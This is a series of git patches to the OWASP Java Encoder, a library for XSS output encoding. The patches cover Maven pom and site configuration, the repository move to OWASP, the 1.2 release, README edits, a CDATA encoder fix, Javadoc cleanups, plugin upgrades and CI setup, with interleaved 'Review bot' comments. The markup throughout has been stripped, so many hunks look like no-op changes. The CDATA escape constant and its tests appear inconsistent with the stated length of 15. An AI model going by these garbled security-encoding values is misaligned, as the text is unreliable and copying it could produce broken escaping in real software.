diff --git a/pom.xml b/pom.xml index bab992c..684ba19 100755 --- a/pom.xml +++ b/pom.xml @@ -85,7 +85,13 @@ scm:git:git@github.com:jmanico/owasp-java-encoder.git https://github.com/jmanico/owasp-java-encoder - + + + gh-pages + gh-pages + http://jmanico.github.io/owasp-java-encoder + + Owasp-java-encoder-project @@ -112,18 +118,23 @@ Jim Manico + OWASP + https://www.owasp.org/ Architect Developer - - - + Jeremy Long - jeremy.long@gmail.com - - + jeremy.long@owasp.org + OWASP + https://www.owasp.org/ + + developer + + + UTF-8 @@ -293,6 +304,20 @@ + + org.apache.maven.plugins + maven-site-plugin + + + org.apache.maven.doxia + doxia-module-markdown + 1.6 + + + + true + + @@ -375,7 +400,6 @@ src/main/config/checkstyle.xml src/main/config/checkstyle-header.txt - @@ -412,5 +436,4 @@ - diff --git a/src/site/site.xml b/src/site/site.xml new file mode 100644 index 0000000..6a1d289 --- /dev/null +++ b/src/site/site.xml @@ -0,0 +1,93 @@ + + + + + org.apache.maven.skins + maven-fluido-skin + 1.3.1 + + + + true + true + + jmanico/owasp-java-encoder + right + gray + + + + + + OWASP Java Encoder Project + OWASP Java Encoder Project + + + + + + + + + + + + + + + + + + + + + + + + +
    Copyright © 2011-2015 OWASP. All Rights Reserved.
    + + -- cgit v1.2.3 From e18e70ee7d586470932a788c7ef7b40b9ab8052b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 6 Apr 2015 18:23:16 -0400 Subject: moved repo to OWASP --- pom.xml | 10 +++++----- src/site/site.xml | 2 +- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/pom.xml b/pom.xml index 684ba19..d31374c 100755 --- a/pom.xml +++ b/pom.xml @@ -81,15 +81,15 @@ - scm:git:git@github.com:jmanico/owasp-java-encoder.git - scm:git:git@github.com:jmanico/owasp-java-encoder.git - https://github.com/jmanico/owasp-java-encoder + scm:git:git@github.com:owasp/owasp-java-encoder.git + scm:git:git@github.com:owasp/owasp-java-encoder.git + https://github.com/owasp/owasp-java-encoder gh-pages gh-pages - http://jmanico.github.io/owasp-java-encoder + http://owasp.github.io/owasp-java-encoder @@ -104,7 +104,7 @@ github - https://github.com/jmanico/owasp-java-encoder/issues + https://github.com/owasp/owasp-java-encoder/issues diff --git a/src/site/site.xml b/src/site/site.xml index 6a1d289..43076a8 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -46,7 +46,7 @@ OF THE POSSIBILITY OF SUCH DAMAGE. true true - jmanico/owasp-java-encoder + owasp/owasp-java-encoder right gray -- cgit v1.2.3 From 59c13e83bff094c636a4ebd88d74516bba8f8c3c Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Wed, 8 Apr 2015 19:42:36 -0400 Subject: minor update to comment unused links --- core/src/site/site.xml | 4 ++-- esapi/src/site/site.xml | 4 ++-- jsp/src/site/site.xml | 4 ++-- src/site/site.xml | 1 - 4 files changed, 6 insertions(+), 7 deletions(-) diff --git a/core/src/site/site.xml b/core/src/site/site.xml index a382f59..b465001 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 245a9e6..877ac16 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml 
@@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index 8b36802..4b3621d 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/src/site/site.xml b/src/site/site.xml index 43076a8..a389c70 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -81,7 +81,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - -- cgit v1.2.3 From 671b191178bcfbd2531bbd4c9a3230a5fd039587 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sun, 12 Apr 2015 07:24:56 -0400 Subject: version 1.2 --- core/pom.xml | 2 +- esapi/pom.xml | 2 +- jsp/pom.xml | 2 +- pom.xml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index eed4fd7..ed348c9 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder diff --git a/esapi/pom.xml b/esapi/pom.xml index 28118fe..efa0359 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder-esapi diff --git a/jsp/pom.xml b/jsp/pom.xml index 383bc6a..43bbcaf 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder-jsp diff --git a/pom.xml b/pom.xml index d31374c..a7285da 100755 --- a/pom.xml +++ b/pom.xml @@ -42,7 +42,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 pom OWASP Encoders Parent -- cgit v1.2.3 From 9fa6b40506f540e3eb991a96cfa2547f7e65b5b2 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sun, 12 Apr 2015 07:40:32 -0400 Subject: version 1.2.1-SNAPSHOT --- core/pom.xml | 2 +- esapi/pom.xml | 2 +- jsp/pom.xml | 2 +- pom.xml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index ed348c9..7fafdac 100644 --- a/core/pom.xml +++ b/core/pom.xml 
@@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder diff --git a/esapi/pom.xml b/esapi/pom.xml index efa0359..def23df 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder-esapi diff --git a/jsp/pom.xml b/jsp/pom.xml index 43bbcaf..1609f91 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder-jsp diff --git a/pom.xml b/pom.xml index a7285da..bb9d7a3 100755 --- a/pom.xml +++ b/pom.xml @@ -42,7 +42,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT pom OWASP Encoders Parent -- cgit v1.2.3 From 5b60b6d2faf74949720fb1a6e202bb237cb6ecee Mon Sep 17 00:00:00 2001 From: Jim Manico Date: Sun, 12 Apr 2015 12:08:24 -0700 Subject: updating read file --- README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index af278c6..fa48e7a 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ For more information on how to use this project, please see https://www.owasp.or Start using the OWASP Java Encoders ----------------------------------- -You can download a JAR from [Maven Central](http://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). +You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). -JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.1.1/encoder-jsp-1.1.1.jar). This jar requires the core library. +JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. The jars are also available in Maven: 
@@ -16,19 +16,19 @@ The jars are also available in Maven: org.owasp.encoder encoder - 1.1.1 + 1.2 org.owasp.encoder encoder-jsp - 1.1.1 + 1.2 ``` Quick Overview -------------- -The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.1.1.jar, import org.owasp.encoder.Encode and start using. +The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.2.jar, import org.owasp.encoder.Encode and start using. Example usage: @@ -43,6 +43,9 @@ Happy Encoding! News ---- +### 2015-04-12 - 1.2 Release on GitHub +OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released! + ### 2014-03-31 - Documentation updated Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! -- cgit v1.2.3 From b64f02d90a0ad2e829742069729eef98d0e79965 Mon Sep 17 00:00:00 2001 From: Jim Manico Date: Sun, 12 Apr 2015 12:19:22 -0700 Subject: updating read file again --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fa48e7a..54cb4e4 100644 --- a/README.md +++ b/README.md 
@@ -8,7 +8,7 @@ Start using the OWASP Java Encoders ----------------------------------- You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). -JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. +JSP tags and functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. The jars are also available in Maven: -- cgit v1.2.3 From 16d1f0dda835a30539b86dbfd2123013f6c2af76 Mon Sep 17 00:00:00 2001 From: EarthCitizen Date: Tue, 20 Oct 2015 17:27:47 -0700 Subject: Fix error in comment --- core/src/main/java/org/owasp/encoder/Encode.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 46003e0..3befe85 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -913,7 +913,7 @@ public final class Encode { * provide the surrounding quotation characters for the string. * Since this performs additional encoding so it can work in all * of the JavaScript contexts listed, it may be slightly less - * efficient then using one of the methods targetted to a specific + * efficient than using one of the methods targetted to a specific * JavaScript context ({@link #forJavaScriptAttribute(String)}, * {@link #forJavaScriptBlock}, {@link #forJavaScriptSource}). * Unless you are interested in saving a few bytes of output or -- cgit v1.2.3 From cd8a32836be29f1f38255368bc590f8d771306e5 Mon Sep 17 00:00:00 2001 
From: Stefan Schueffler Date: Tue, 29 Nov 2016 10:57:46 +0100 Subject: improve CDATA Encoder to not emit intermediate characters between adjacent CDATA sections --- core/src/main/java/org/owasp/encoder/CDATAEncoder.java | 15 +++++++-------- .../src/test/java/org/owasp/encoder/CDATAEncoderTest.java | 8 ++++---- 2 files changed, 11 insertions(+), 12 deletions(-) diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java index 8702a65..07f54ff 100644 --- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java @@ -40,10 +40,9 @@ import java.nio.charset.CoderResult; * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes - * "]]>" (to "]]>]]<![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will - * have to handle multiple CDATA events with character events between. As an alternate approach, the caller could pre-encode "]]>" - * to something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML - * characters. + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will + * have to handle multiple CDATA events. As an alternate approach, the caller could pre-encode "]]>" to something of their + * choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML characters. * * @author Jeff Ichnowski */ 
@@ -53,10 +52,10 @@ class CDATAEncoder extends Encoder { * The encoding of @{code "]]>"}. */ private static final char[] CDATA_END_ENCODED - = "]]>]]".toCharArray(); + = "]]]]>".toCharArray(); /** - * Length of {@code "]]>]]"}. + * Length of {@code "]]]]>"}. */ private static final int CDATA_END_ENCODED_LENGTH = 15; @@ -69,8 +68,8 @@ class CDATAEncoder extends Encoder { protected int maxEncodedLength(int n) { // "]" becomes "]" (1 -> 1) // "]]" becomes "]]" (2 -> 2) - // "]]>" becomes "]]>]]" (3 -> 15) - // "]]>]" becomes "]]>]]]" (3 -> 15 + 1 -> 1) + // "]]>" becomes "]]]]>" (3 -> 15) + // "]]>]" becomes "]]]]>]" (3 -> 15 + 1 -> 1) // ... int worstCase = n / CDATA_END_LENGTH; diff --git a/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java b/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java index 3bc060b..5a28cfa 100644 --- a/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java +++ b/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java @@ -45,12 +45,12 @@ import junit.framework.TestCase; public class CDATAEncoderTest extends TestCase { public static Test suite() { return new EncoderTestSuiteBuilder(CDATAEncoderTest.class, new CDATAEncoder(), "-safe-", "-]]>-") - .encode("]]>]]", "]]>") + .encode("]]]]>", "]]>") .encode("]", "]") .encode("]]", "]]") - .encode("]]>]]]", "]]>]") - .encode("]]>]]]>", "]]>]>") - .encode("]]>]]>", "]]>>") + .encode("]]]]>]", "]]>]") + .encode("]]]]>]>", "]]>]>") + .encode("]]]]>>", "]]>>") .encode("]]]]]", "]]]]]") .encode("<\"&\'>", "<\"&\'>") // valid in CDATA, not in XML -- cgit v1.2.3 From 4d546b593d4fd233395bab1f95fb8ce3c3c0a208 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:30:47 -0500 Subject: Fixed JavaDoc --- core/src/main/java/org/owasp/encoder/Encode.java | 132 +++++++++++----------- core/src/main/java/org/owasp/encoder/Encoder.java | 2 +- 2 files changed, 67 insertions(+), 67 deletions(-) 
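Review bot: `CDATA_END_ENCODED_LENGTH` is still a hand-maintained literal `15` while this commit changes the `CDATA_END_ENCODED` string it describes; the two happen to stay in sync here, but nothing enforces it, and presumably `maxEncodedLength` (the following hunk builds its worst case from these constants) would undersize the output estimate if they ever drifted. Deriving it, `private static final int CDATA_END_ENCODED_LENGTH = CDATA_END_ENCODED.length;`, removes that coupling, and the "3 -> 15" comments in `maxEncodedLength` then only need to be illustrative. The context line above the constant still reads `@{code "]]>"}` where `{@code "]]>"}` is intended.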
diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 3befe85..3e3dc59 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -43,7 +43,7 @@ import java.nio.charset.CoderResult; * Encode -- fluent interface for contextual encoding. Example usage in a JSP: * *
    - *     <input value="<%=Encode.forHtml(value)%>" />
    + *     <input value="<%=Encode.forHtml(value)%>" />
      * 
    * *

    There are two versions of each contextual encoding method. The first @@ -71,15 +71,15 @@ public final class Encode { * bytes or are writing a framework that utilizes this * package.

    * - *
    Example JSP Usage
    + * Example JSP Usage *
    -     *     <div><%=Encode.forHtml(unsafeData)%></div>
    +     *     <div><%=Encode.forHtml(unsafeData)%></div>
          *
    -     *     <input value="<%=Encode.forHtml(unsafeData)%>" />
    +     *     <input value="<%=Encode.forHtml(unsafeData)%>" />
          * 
    * - *
    Encoding Table
    - * + *
    + * * * * @@ -110,7 +110,7 @@ public final class Encode { * *
    Encoding Table
    Input
    * - *
    Additional Notes
    + * Additional Notes *
      * *
    • The encoding of the greater-than sign ({@code >}) is not @@ -160,12 +160,12 @@ public final class Encode { * HTML attributes. Use either forHtml or forHtmlAttribute for those * methods.

      * - *
      Example JSP Usage
      + * Example JSP Usage *
      -     *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
      +     *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
            * 
      - *
      Encoding Table
      - * + *
      + * * * * @@ -188,7 +188,7 @@ public final class Encode { * *
      Encoding Table
      Input
      * - *
      Additional Notes
      + * Additional Notes *
        * *
      • Single-quote character ({@code '}) and double-quote @@ -238,13 +238,13 @@ public final class Encode { /** *

        This method encodes for HTML text attributes.

        * - *
        Example JSP Usage
        + * Example JSP Usage *
        -     *     <div><%=Encode.forHtml(unsafeData)%></div>
        +     *     <div><%=Encode.forHtml(unsafeData)%></div>
              * 
        * - *
        Encoding Table
        - * + *
        + * * * * @@ -271,7 +271,7 @@ public final class Encode { * *
        Encoding Table
        Input
        * - *
        Additional Notes
        + * Additional Notes *
          * *
        • Both the single-quote character ({@code '}) and the @@ -339,13 +339,13 @@ public final class Encode { * attempt has been made to optimize this encoding, though it is * still probably faster than other encoding libraries.

          * - *
          Example JSP Usage
          + * Example JSP Usage *
          -     *     <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> >
          +     *     <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> >
                * 
          * - *
          Encoding Table
          - * + *
          + * * * * @@ -372,7 +372,7 @@ public final class Encode { * *
          Encoding Table
          Input
          * - *
          Additional Notes
          + * Additional Notes *
            * *
          • The following characters are not encoded: @@ -436,16 +436,16 @@ public final class Encode { * characters. It is safe for use in both style blocks and attributes in * HTML. * - *
            Example JSP Usage
            + * Example JSP Usage *
            -     *     <div style="background: url('<=Encode.forCssString(...)%>');">
            +     *     <div style="background: url('<=Encode.forCssString(...)%>');">
                  *
            -     *     <style type="text/css">
            -     *         background: url('<%=Encode.forCssString(...)%>');
            -     *     </style>
            +     *     <style type="text/css">
            +     *         background: url('<%=Encode.forCssString(...)%>');
            +     *     </style>
                  * 
            * - *
            Encoding Notes
            + * Encoding Notes *
              * *
            • The following characters are encoded using hexidecimal @@ -515,15 +515,15 @@ public final class Encode { * itself. The caller should insure that the URL is safe for embedding * (e.g. input validation) by other means. * - *
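Review bot: The JSP example in the `forCssString` Javadoc is unchanged on the new side and still reads `<div style="background: url('<=Encode.forCssString(...)%>');">`, where the expression tag is missing its `%`; it should be `<%=Encode.forCssString(...)%>`, matching the `<style>` block example directly below it. A reader who copies the line as written gets a literal `<=Encode.forCssString(...)` in the page instead of an encoded value, which is a poor failure mode for a security library's documentation. The `forCssUrl` example in the next hunk has the same `<=Encode.forCssUrl(...)%>` defect. Both hunks also keep the spelling `hexidecimal` in "encoded using hexidecimal encodings", which should be `hexadecimal`.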
              Example JSP Usage
              + * Example JSP Usage *
              -     *     <div style="background:url(<=Encode.forCssUrl(...)%>);">
              +     *     <div style="background:url(<=Encode.forCssUrl(...)%>);">
                    *
              -     *     <style type="text/css">
              -     *         background: url(<%=Encode.forCssUrl(...)%>);
              -     *     </style>
              +     *     <style type="text/css">
              +     *         background: url(<%=Encode.forCssUrl(...)%>);
              +     *     </style>
                    * 
              - *
              Encoding Notes
              + * Encoding Notes *
                * *
              • The following characters are encoded using hexidecimal @@ -592,15 +592,15 @@ public final class Encode { * example a "javascript:" URL provided by a malicious user would be * "properly" escaped, and still execute. * - *
                Encoding Table
                + * Encoding Table *

                The following characters are not encoded:

                *
                -     * U+20:   !   # $   & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ;   =   ?
                +     * U+20:   !   # $   & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ;   =   ?
                      * U+40: @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [   ]   _
                      * U+60:   a b c d e f g h i j k l m n o p q r s t u v w x y z       ~
                      * 
                * - *
                Encoding Notes
                + * Encoding Notes *
                  * *
                • The single-quote character({@code '}) is not encoded.
                • @@ -657,12 +657,12 @@ public final class Encode { * interpreted as part of another component. * *
                  -     *     <a href="http://www.owasp.org/<%=Encode.forUriComponent(...)%>?query#fragment">
                  +     *     <a href="http://www.owasp.org/<%=Encode.forUriComponent(...)%>?query#fragment">
                        *
                  -     *     <a href="/search?value=<%=Encode.forUriComponent(...)%>&order=1#top">
                  +     *     <a href="/search?value=<%=Encode.forUriComponent(...)%>&order=1#top">
                        * 
                  * - *
                  Encoding Table
                  + * Encoding Table *

                  The following characters are not encoded:

                  *
                        * U+20:                           - .   0 1 2 3 4 5 6 7 8 9
                  @@ -670,7 +670,7 @@ public final class Encode {
                        * U+60:   a b c d e f g h i j k l m n o p q r s t u v w x y z       ~
                        * 
                  * - *
                  Encoding Notes
                  + * Encoding Notes *
                    * *
                  • Unlike {@link #forUri(String)} this method is safe to be @@ -810,10 +810,10 @@ public final class Encode { * caller will need to come up with their own encode/decode system.

                    * *
                    -     *     out.println("<?xml version='1.0'?>");
                    -     *     out.println("<data>");
                    -     *     out.println("&;lt;!-- "+Encode.forXmlComment(comment)+" -->");
                    -     *     out.println("</data>");
                    +     *     out.println("<?xml version='1.0'?>");
                    +     *     out.println("<data>");
                    +     *     out.println("<!-- "+Encode.forXmlComment(comment)+" -->");
                    +     *     out.println("</data>");
                          * 
                    * * @param input the input to encode @@ -846,7 +846,7 @@ public final class Encode { * provide the CDATA section boundaries. * *
                    -     *     <xml-data><![CDATA[<%=Encode.forCDATA(...)%>]]></xml-data>
                    +     *     <xml-data><![CDATA[<%=Encode.forCDATA(...)%>]]></xml-data>
                          * 
                    * * @param input the input to encode @@ -920,16 +920,16 @@ public final class Encode { * are writing a framework on top of this library, it is recommend * that you use this method over the others.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: *
                    -     *    <button onclick="alert('<%=Encode.forJavaScript(data)%>');">
                    -     *    <script type="text/javascript">
                    -     *        var data = "<%=Encode.forJavaScript(data)%>";
                    -     *    </script>
                    +     *    <button onclick="alert('<%=Encode.forJavaScript(data)%>');">
                    +     *    <script type="text/javascript">
                    +     *        var data = "<%=Encode.forJavaScript(data)%>";
                    +     *    </script>
                          * 
                    * - *
                    Encoding Description
                    * + * * * * @@ -972,7 +972,7 @@ public final class Encode { * "\&quot;".) * * - * + * * * * @@ -988,7 +988,7 @@ public final class Encode { * * * * * @@ -1041,9 +1041,9 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: *
                    -     *    <button onclick="alert('<%=Encode.forJavaScriptAttribute(data)%>');">
                    +     *    <button onclick="alert('<%=Encode.forJavaScriptAttribute(data)%>');">
                          * 
                    * * @param input the input string to encode @@ -1084,11 +1084,11 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: *
                    -     *    <script type="text/javascript">
                    -     *        var data = "<%=Encode.forJavaScriptBlock(data)%>";
                    -     *    </script>
                    +     *    <script type="text/javascript">
                    +     *        var data = "<%=Encode.forJavaScriptBlock(data)%>";
                    +     *    </script>
                          * 
                    * * @param input the input string to encode @@ -1129,19 +1129,19 @@ public final class Encode { * recommend that you use {@link #forJavaScript(String)} over this * method.

                    * - *
                    Example JSP Usage:
                    + * Example JSP Usage: * This example is serving up JavaScript source directly: *
                    -     *    <%@page contentType="text/javascript; charset=UTF-8"%>
                    -     *    var data = "<%=Encode.forJavaScriptSource(data)%>";
                    +     *    <%@page contentType="text/javascript; charset=UTF-8"%>
                    +     *    var data = "<%=Encode.forJavaScriptSource(data)%>";
                          * 
                    * * This example is serving up JSON data (users of this use-case * are encouraged to read up on "JSON Hijacking"): *
                    -     *    <%@page contentType="application/json; charset=UTF-8"%>
                    -     *    <% myapp.jsonHijackingPreventionMeasure(); %>
                    -     *    {"data":"<%=Encode.forJavaScriptSource(data)%>"}
                    +     *    <%@page contentType="application/json; charset=UTF-8"%>
                    +     *    <% myapp.jsonHijackingPreventionMeasure(); %>
                    +     *    {"data":"<%=Encode.forJavaScriptSource(data)%>"}
                          * 
                    * * @param input the input string to encode diff --git a/core/src/main/java/org/owasp/encoder/Encoder.java b/core/src/main/java/org/owasp/encoder/Encoder.java index 7f4b887..3c5656e 100644 --- a/core/src/main/java/org/owasp/encoder/Encoder.java +++ b/core/src/main/java/org/owasp/encoder/Encoder.java @@ -110,7 +110,7 @@ public abstract class Encoder { * true}). This will happen when the encoder needs to see more * input before determining what to do--for example when encoding * for CDATA, if the input ends with {@code "foo]]"}, the encoder - * will need to see the next character to determine if it is a ">" + * will need to see the next character to determine if it is a ">" * or not.

                    * *

                    Example usage:

                    -- cgit v1.2.3 From 6a4192cb78cc95f11f84ed827cef286c73fba900 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:31:08 -0500 Subject: added license badge --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 54cb4e4..5817cee 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,8 @@ OWASP Java Encoder Project ========================== + +[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) + Contextual Output Encoding is a computer programming technique necessary to stop Cross Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage. For more information on how to use this project, please see https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project. -- cgit v1.2.3 From bd9e935d4e03c3761e708b28ea9a3d2a01c43511 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:43:58 -0500 Subject: fixed test case for PR #5 --- jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java index 1720d4e..e7f6f90 100644 --- a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java @@ -67,7 +67,7 @@ public class ForCDATATagTest extends EncodingTagTest { System.out.println("doTag"); ForCDATATag instance = new ForCDATATag(); String value = "
                    ]]>
                    "; - String expected = "
                    ]]>]]
                    "; + String expected = "
                    ]]]]>
                    "; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); -- cgit v1.2.3 From a8b1f6a3e01fb9ac0bbd1de3b12a1ebd19e31d15 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:44:12 -0500 Subject: upgraded plugins --- pom.xml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/pom.xml b/pom.xml index bb9d7a3..a37e0d8 100755 --- a/pom.xml +++ b/pom.xml @@ -163,42 +163,42 @@ org.apache.maven.plugins maven-compiler-plugin - 3.2 + 3.5.1 org.apache.maven.plugins maven-jar-plugin - 2.5 + 3.0.2 org.apache.maven.plugins maven-source-plugin - 2.4 + 3.0.1 org.apache.maven.plugins maven-javadoc-plugin - 2.10.1 + 2.10.4 org.codehaus.mojo cobertura-maven-plugin - 2.5.2 + 2.7 org.apache.maven.plugins maven-failsafe-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins maven-surefire-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins maven-surefire-report-plugin - 2.18.1 + 2.19.1 org.apache.maven.plugins @@ -208,22 +208,22 @@ org.apache.maven.plugins maven-site-plugin - 3.4 + 3.5.1 org.apache.maven.plugins maven-project-info-reports-plugin - 2.8 + 2.9 org.apache.maven.plugins maven-pmd-plugin - 3.4 + 3.6 org.codehaus.mojo versions-maven-plugin - 2.1 + 2.3 org.apache.maven.plugins @@ -233,7 +233,7 @@ org.codehaus.mojo findbugs-maven-plugin - 3.0.0 + 3.0.4 -- cgit v1.2.3 From 8b77fc5336921b62478201bd8a7b3ad9f68ea9ca Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 14:25:19 -0500 Subject: adding CI --- .travis.yml | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..91d665a --- /dev/null +++ b/.travis.yml @@ -0,0 +1,6 @@ +language: java +jdk: + - oraclejdk8 + - oraclejdk7 + - openjdk6 +script: mvn test -B -- cgit v1.2.3 From ca5cfb63f25c56ad489aa9de5a70f8a6c094b8ad Mon Sep 17 00:00:00 2001 
